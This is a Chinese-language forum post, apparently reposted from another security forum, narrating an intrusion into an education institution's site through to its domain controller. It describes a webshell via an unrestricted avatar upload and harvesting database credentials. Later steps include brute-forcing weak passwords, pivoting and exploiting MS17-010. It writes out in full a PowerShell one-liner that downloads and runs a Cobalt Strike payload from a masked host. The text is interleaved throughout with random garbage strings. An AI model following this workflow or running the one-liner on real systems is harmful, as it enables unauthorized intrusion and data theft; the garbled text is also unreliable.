|
3 C7 m% b& H, a. G/ v
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路4 G9 h+ R5 z8 w& V5 Y# e. p
4 D& h$ i0 E& Q5 I1 f+ d9 j! i
% ~" _1 q' w' a) }
3 U( o7 p, G0 F, L7 l
# M0 J. x$ K" }- v" m2 n" ]! P" l# N
5 N9 \: ~, F3 O r- A; S 正文( F2 H4 g0 t' F! R5 R' F
1 M' i9 U6 ?) i: `* I1 }. ]/ U
+ J/ `; Q1 b; m2 r# a3 ~
1 |9 i" g# |8 ^3 _' A }8 t
$ U6 Z; l' R0 i
# p5 P3 V2 S2 ?+ n+ e 目标:www.xxxx.com(一家教育机构)
: r$ X$ S! ^' J: X- _! h5 ]
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
5 l! r' i% r' C; }; S2 r $ _) G0 F' c" |: w f
2 w& l4 G5 o2 Z- A6 n8 c  5 \, R% m; G! w$ I4 x. ?
. v+ c5 {1 r$ d' G {0 e/ \) x+ ]* c% V- ^" q, r) B
进行了简单的信息搜集
5 t" }5 i! F* B, ^$ c- F
/ L; c7 c$ K$ T) `4 j4 q' Y4 U" [( o* I
( ]# ?) z* g: Y" X# u. u" P
, P$ ?% G( j9 s: `0 p$ y
子域名搜集. t) e# W* N) c6 q
) S& M- n3 r' Y3 S; l6 J! @) M# j7 V
) y' P7 Y0 Z' l: _( I$ i  6 T: j5 p$ n# ~
T' A v) g: X. v V" c) X$ [& |
# X5 j6 Q4 E5 n4 T6 x: V) } fofa找资产
7 t; ]: y7 n; w2 q
2 ]& }8 P5 S1 c# b& l( I3 A( }( G. e! F" t- D' r O
9 |* F4 U7 R/ _* V: R; ^
6 D' n1 Y2 d- Y& q; X' F
# G! t3 [- E5 B1 d5 } 0 O- @7 P9 |% |4 A1 m
; `* I% v1 |) r 一共七个资产。去重之后只有两个。
- S/ z8 Q9 g( X3 P: W
5 z( y! l5 O' F: Q; n/ N7 ?
. F8 |% @ H9 |$ `" u0 c) G, B- k, B 6 N' y, s% z9 M( l
7 O! ~; u2 L& ]% t
目录探测' l5 i/ S6 j; [
! P: U0 n5 f+ g7 }) Q- h3 \! Z% }: E2 d0 l0 y
" N# A) {( p5 e2 i# K; f7 f
( {6 M2 X6 G- `! v/ R: ^
) Q, O) M T0 m5 M$ d% | 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
5 S+ l: a6 ^: A& d6 b
& u! v7 l9 w2 u$ i/ ]1 B% ]1 \4 f* c8 j( u
* r6 Z" H4 z# W3 @' \. P
' Q L' `8 T5 x. a' S% p2 f 我又尝试了通过修改返回包来绕过登录界面8 m! W2 d$ S) b. _5 V
& W- y7 N" O, r; |
1 h Z3 ]5 ? k/ y( h' \* _( l" y: H 
m. }5 m1 A1 a; S! L2 I b8 ^
# n- x( _$ `# \9 @4 k9 V, \* o, ^3 y+ p. u4 K& v
还是不行,尝试注入无果* D0 s! Q3 C' F( D
- L2 V5 `( ?7 l7 U. Z
3 X/ M4 ~4 \! u! b: g$ U' z4 b
 ' j+ |1 v; m: m3 M( _" |0 {
' V4 Q3 J8 ]# C* t: d# U1 y4 ]+ e( D/ V/ i/ ]
不过我目录探测出了一处Spring信息泄露
u7 V) T$ W! ?3 w6 H
! E8 h; T2 Q# S Q$ H% I$ d& x, Q
, Q8 f6 F6 m: }" p x. f
1 H3 M) o. Z- p6 @2 G6 f2 p 
2 n+ _' f" u% w5 L, H
* w" H' ~, b1 O& [; j' y0 x, O% O& b; E7 A; ^/ M
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
4 U# ^ q- X5 j ! J7 V7 C( p7 a9 f+ z/ c
7 O* a) v$ ^4 }! H8 g( d- o3 y
. R+ c% P/ C3 A+ i! d, f
# H [: M0 O6 S6 I4 v; m4 W$ L2 A. E" ~8 ], ~9 a7 B1 k
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
) P! x6 C9 S ]; S$ f
! b5 M! g7 z' B
, x. V: j- H6 N6 q5 U& y  % _! a, [( M( I4 P4 v' `
$ [( _9 d/ L0 C
5 H% v+ {& ?. R0 C; M ?) H: `. ` 获取有些师傅到这一步就手机抓包电脑测了。1 i8 ]& i7 D, t1 ^- x. W5 E9 _: }6 }
- U f# c" V3 S
6 f/ c% @( z% k/ v Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
5 N9 M) V0 `5 k/ v , U' Z$ c4 C! v( ^3 n. R) v
g2 D! Y+ D- d H8 u; Y 其中在一个公众号发现了小程序,可以进行注册。
+ d6 n$ z# P8 t6 h5 q5 P5 R
; g* m4 I6 c5 `+ z% T
2 D3 p; p7 U7 f o8 K5 N2 w 看到了头像上传,尝试上传获取WebShell
( v* ]+ y9 M4 w 2 C9 W4 a h) }" i. T
R2 e1 d$ F, g
3 E/ p# `$ {7 h% `. L, D $ N, s' I) y6 ?. C* g8 B
C) I4 T4 S- ]6 f7 y
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问3 E& L' o0 s9 w0 U7 h5 Z
7 a7 s" |1 \5 C- q k, \
) d# _- @! ^) p& P7 k 
8 j( t% z8 }; M* |9 M
/ b @" z7 H7 ]# U: ? D; ]3 N3 E5 v
6 V* E% d# a# n 然后上了大马- ^& W; ^& `0 L& E& x) r$ S4 o8 M# c
% p( v8 v3 a: n1 M2 r" V* |+ X% s3 y7 m# ~/ @: _& o
 . _$ B. Y2 {0 [9 }% \, T' p! N
7 D" W3 U) e/ ]% X8 b. e* L9 |, \8 T: M9 E8 I
( G$ F. b: L1 d3 u6 R
3 a3 e* E# b- w- G, `8 f: x$ q4 {' A
$ ^# r7 D) O. z$ X" w, ]9 v 通过翻找文件发现数据库账号密码( B$ s0 G1 M# E
8 Y2 O9 e& r, q+ X) ], ~
6 R$ A# R# m3 T! ?0 ] 
* I/ t1 C" ?6 ~# i % r" p+ U- R& E
/ v5 b. K" c$ g3 L2 E
--内网渗透
) |% v0 x) A S9 o( G/ A
/ n6 U% ]' c, G c1 A! K* `2 y5 ]- S8 s
直接通过powershell执行 cs上线+ m b( L5 R8 W- W8 N; _
( G9 ]! t4 @) V. P5 c( U! \7 X6 `0 U( i0 h+ G
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))", n: m4 Z, V* n4 j# f8 i, n& Z/ z3 ?
3 N3 ]# i& r* P
) O6 m, d+ @" p- C! Y; _  $ T+ g; I9 ]: M0 p/ U, I
* Y0 D6 v; Y( R) \" p& ~
" p" O% e2 O- \" a6 u$ s- n8 u
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
# M0 t, u6 \8 Y- Q& E6 x 2 E. R! w% r, J9 U/ `
. O7 W) x9 G' e( R4 y4 _
, \1 @/ ?7 v" }. r4 y" s* O
* A Z( ~ x! X# k5 k6 V+ o# c: q2 w% x9 N0 u( y z0 L6 h* |$ {$ u
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
, p, g) c( ]. a5 j
O: t# ^# K& F- @. |) E' ~
: k% C& s- g! e; S
( d0 W1 w$ H' F& C" L8 j+ A6 z4 G4 ^
- a. G3 e( I( g" g7 H
5 b/ g; K' C1 D" z. c) c8 C0 t 
$ ?' @4 U/ }4 b5 `3 K
0 q3 f& n) H; D2 b/ O, `# T
# G5 L! R8 U# G. k( f" _ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
$ y' N3 B1 Z7 i8 \9 K* \
0 f6 f! ?2 Z e7 Z, t% g
4 i; D: T2 V0 U) ?5 g1 J" \
2 ] D7 N, ~* v# ]4 e8 N2 X( C+ d! `/ |6 O; A
' Z% f' R, w5 V. ^" l: V n
$ G) t, e4 ~3 |- z1 J
. `+ W: c- D& n ]
2 t' ~1 J2 X9 {$ }, P7 x
, |" V2 I4 q2 l; U2 ? p# i
( a' H. L; d- t" s$ p: `# K' }9 F
/ t7 q1 l# n/ N+ d( M4 d6 v7 `7 O9 z. D
2 ]6 F% y/ Q8 h8 U- G: r) Z! B
" q }8 l9 n3 `8 L9 K x+ f* ]% c/ E+ Y+ ^# w6 g
小结
9 |2 y0 e1 h, m8 J0 x# g ( P$ W6 @ W+ z9 y
2 J6 a* C* E- }1 G
: D. \' P* b1 Y+ M2 x7 A
0 P! A {6 v: k7 p8 f6 j
9 v* ]6 P) y. T9 y7 V0 l. B/ j 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
2 M4 r( B& s) P: W
& a5 [, B3 C5 h- w
E$ s" |- e4 z+ C' W. p : W* E- A% u0 Q, r# v4 ~
' ]7 z3 U) G% l
! @& A5 s( |. o- i/ g- k
- 1 c, I* H; F0 N- S D/ Z) ^# J
) p* ]+ h8 {" b y3 k6 h/ l7 a
/ `8 d: R2 `& Z& [) ~
-
- R/ ~) G- a) J5 ]' Y: V/ c + {7 X$ L, F) _: n9 P2 q
- J5 F2 X; f, r
. c( i4 ]7 x8 P# F: W: O$ r5 x r$ A7 t6 o
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html& ]0 _- z- o5 r
6 L. S9 x: }. g6 y+ f
: A" a5 v6 b- k* G/ n+ y& X
s# O0 n( z7 X) [ | 
发表于 2024-3-1 19:41:32
收藏
支持
反对